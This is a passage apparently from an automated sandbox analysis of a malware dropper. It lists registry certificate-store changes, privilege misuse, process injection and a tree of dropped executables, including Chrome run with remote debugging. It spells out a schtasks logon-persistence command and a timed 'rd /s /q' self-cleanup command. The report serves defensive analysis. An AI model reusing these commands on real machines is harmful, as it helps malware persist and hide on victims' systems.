2b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	4363463463464363463463463.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2376	schtasks.exe
3640	schtasks.exe
3368	schtasks.exe
3836	schtasks.exe
916	schtasks.exe
3900	schtasks.exe
1972	schtasks.exe
4108	schtasks.exe
568	schtasks.exe
1568	schtasks.exe
5324	schtasks.exe
5408	schtasks.exe
5856	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1760	Discord3.exe
1760	Discord3.exe
1760	Discord3.exe
2456	TPB-1.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
2456	TPB-1.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1704	random.exe
1504	chrome.exe
1504	chrome.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
2456	TPB-1.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe
1736	WatchDog.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1696	Token%20Gen.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
460	Process not Found

Suspicious use of AdjustPrivilegeToken 33 IoCs

description	pid	Process
Token: SeDebugPrivilege	2172	4363463463464363463463463.exe
Token: 33	2816	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2816	AUDIODG.EXE
Token: 33	2816	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2816	AUDIODG.EXE
Token: SeDebugPrivilege	1760	Discord3.exe
Token: SeDebugPrivilege	2952	Discord.exe
Token: SeDebugPrivilege	1736	WatchDog.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeDebugPrivilege	2132	powershell.exe
Token: SeDebugPrivilege	2996	227131299.exe
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeDebugPrivilege	2312	powershell.exe
Token: SeLockMemoryPrivilege	956	dwm.exe
Token: SeLockMemoryPrivilege	956	dwm.exe
Token: SeDebugPrivilege	2708	discord.exe
Token: SeDebugPrivilege	5360	Client.exe
Token: SeDebugPrivilege	2744	Vhpcde.exe
Token: SeDebugPrivilege	5452	RegSvcs.exe
Token: SeDebugPrivilege	5904	client.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	4268	4363463463464363463463463.exe
Token: SeDebugPrivilege	5072	powershell.exe
Token: SeDebugPrivilege	2336	svchost.exe
Token: SeDebugPrivilege	3096	4363463463464363463463463.exe
Token: SeDebugPrivilege	3512	RMS1.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe
956	dwm.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3028	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
5360	Client.exe
5812	config.exe
5812	config.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2172 wrote to memory of 2812	2172	4363463463464363463463463.exe	32
PID 2172 wrote to memory of 2812	2172	4363463463464363463463463.exe	32
PID 2172 wrote to memory of 2812	2172	4363463463464363463463463.exe	32
PID 2172 wrote to memory of 2812	2172	4363463463464363463463463.exe	32
PID 2172 wrote to memory of 904	2172	4363463463464363463463463.exe	34
PID 2172 wrote to memory of 904	2172	4363463463464363463463463.exe	34
PID 2172 wrote to memory of 904	2172	4363463463464363463463463.exe	34
PID 2172 wrote to memory of 904	2172	4363463463464363463463463.exe	34
PID 2172 wrote to memory of 1584	2172	4363463463464363463463463.exe	36
PID 2172 wrote to memory of 1584	2172	4363463463464363463463463.exe	36
PID 2172 wrote to memory of 1584	2172	4363463463464363463463463.exe	36
PID 2172 wrote to memory of 1584	2172	4363463463464363463463463.exe	36
PID 1584 wrote to memory of 1676	1584	uhigdbf.exe	37
PID 1584 wrote to memory of 1676	1584	uhigdbf.exe	37
PID 1584 wrote to memory of 1676	1584	uhigdbf.exe	37
PID 2172 wrote to memory of 1760	2172	4363463463464363463463463.exe	38
PID 2172 wrote to memory of 1760	2172	4363463463464363463463463.exe	38
PID 2172 wrote to memory of 1760	2172	4363463463464363463463463.exe	38
PID 2172 wrote to memory of 1760	2172	4363463463464363463463463.exe	38
PID 1676 wrote to memory of 2260	1676	cmd.exe	40
PID 1676 wrote to memory of 2260	1676	cmd.exe	40
PID 1676 wrote to memory of 2260	1676	cmd.exe	40
PID 2260 wrote to memory of 2660	2260	clamer.exe	41
PID 2260 wrote to memory of 2660	2260	clamer.exe	41
PID 2260 wrote to memory of 2660	2260	clamer.exe	41
PID 2260 wrote to memory of 2660	2260	clamer.exe	41
PID 1760 wrote to memory of 1308	1760	Discord3.exe	44
PID 1760 wrote to memory of 1308	1760	Discord3.exe	44
PID 1760 wrote to memory of 1308	1760	Discord3.exe	44
PID 1760 wrote to memory of 1308	1760	Discord3.exe	44
PID 1760 wrote to memory of 1616	1760	Discord3.exe	46
PID 1760 wrote to memory of 1616	1760	Discord3.exe	46
PID 1760 wrote to memory of 1616	1760	Discord3.exe	46
PID 1760 wrote to memory of 1616	1760	Discord3.exe	46
PID 1308 wrote to memory of 568	1308	cmd.exe	48
PID 1308 wrote to memory of 568	1308	cmd.exe	48
PID 1308 wrote to memory of 568	1308	cmd.exe	48
PID 1308 wrote to memory of 568	1308	cmd.exe	48
PID 1616 wrote to memory of 872	1616	cmd.exe	49
PID 1616 wrote to memory of 872	1616	cmd.exe	49
PID 1616 wrote to memory of 872	1616	cmd.exe	49
PID 1616 wrote to memory of 872	1616	cmd.exe	49
PID 1616 wrote to memory of 2952	1616	cmd.exe	50
PID 1616 wrote to memory of 2952	1616	cmd.exe	50
PID 1616 wrote to memory of 2952	1616	cmd.exe	50
PID 1616 wrote to memory of 2952	1616	cmd.exe	50
PID 2172 wrote to memory of 3028	2172	4363463463464363463463463.exe	52
PID 2172 wrote to memory of 3028	2172	4363463463464363463463463.exe	52
PID 2172 wrote to memory of 3028	2172	4363463463464363463463463.exe	52
PID 2172 wrote to memory of 3028	2172	4363463463464363463463463.exe	52
PID 3028 wrote to memory of 1532	3028	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe	53
PID 3028 wrote to memory of 1532	3028	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe	53
PID 3028 wrote to memory of 1532	3028	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe	53
PID 3028 wrote to memory of 1532	3028	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe	53
PID 2172 wrote to memory of 2456	2172	4363463463464363463463463.exe	54
PID 2172 wrote to memory of 2456	2172	4363463463464363463463463.exe	54
PID 2172 wrote to memory of 2456	2172	4363463463464363463463463.exe	54
PID 2172 wrote to memory of 2456	2172	4363463463464363463463463.exe	54
PID 2172 wrote to memory of 2764	2172	4363463463464363463463463.exe	56
PID 2172 wrote to memory of 2764	2172	4363463463464363463463463.exe	56
PID 2172 wrote to memory of 2764	2172	4363463463464363463463463.exe	56
PID 2172 wrote to memory of 2764	2172	4363463463464363463463463.exe	56
PID 2172 wrote to memory of 1736	2172	4363463463464363463463463.exe	57
PID 2172 wrote to memory of 1736	2172	4363463463464363463463463.exe	57

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Loads dropped DLL
PID:1192
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Modifies system certificate store
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2172
- - C:\Users\Admin\AppData\Local\Temp\Files\buildred.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\buildred.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    PID:2812
- - C:\Users\Admin\AppData\Local\Temp\Files\postbox.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\postbox.exe"
    3⤵
    - Executes dropped EXE
    PID:904
- - C:\Users\Admin\AppData\Local\Temp\Files\uhigdbf.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\uhigdbf.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1584
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1676
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe
        
        clamer.exe -priverdD
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2260
      - C:\Users\Admin\AppData\Local\Temp\RarSFX1\fseawd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\fseawd.exe"
        6⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2660
- - C:\Users\Admin\AppData\Local\Temp\Files\Discord3.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Discord3.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1760
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1308
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:568
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp74F1.tmp.bat""
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1616
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:872
    - - C:\Users\Admin\AppData\Roaming\Discord.exe
        
        "C:\Users\Admin\AppData\Roaming\Discord.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2952
- - C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3028
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3028 -s 216
      4⤵
      Loads dropped DLL
      Program crash
      PID:1532
- - C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:2456
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:1504
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5659758,0x7fef5659768,0x7fef5659778
        5⤵
        
        PID:2080
    - - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        5⤵
        
        PID:2508
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1168 --field-trial-handle=1868,i,10168353072591949519,2360916401177516883,131072 /prefetch:2
        5⤵
        
        PID:2908
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1388 --field-trial-handle=1868,i,10168353072591949519,2360916401177516883,131072 /prefetch:8
        5⤵
        
        PID:2152
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1452 --field-trial-handle=1868,i,10168353072591949519,2360916401177516883,131072 /prefetch:8
        5⤵
        
        PID:2380
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2272 --field-trial-handle=1868,i,10168353072591949519,2360916401177516883,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2672
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2280 --field-trial-handle=1868,i,10168353072591949519,2360916401177516883,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1332
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2100 --field-trial-handle=1868,i,10168353072591949519,2360916401177516883,131072 /prefetch:2
        5⤵
        
        PID:272
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1928 --field-trial-handle=1868,i,10168353072591949519,2360916401177516883,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2016
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CFHCGHJDBFII" & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:2588
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2408
- - C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2764
- - C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1736
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1736 -s 792
      4⤵
      Loads dropped DLL
      Program crash
      PID:2248
- - C:\Users\Admin\AppData\Local\Temp\Files\Token%20Gen.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Token%20Gen.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:316
  - - C:\Users\Admin\AppData\Local\Temp\Files\Token%20Gen.exe
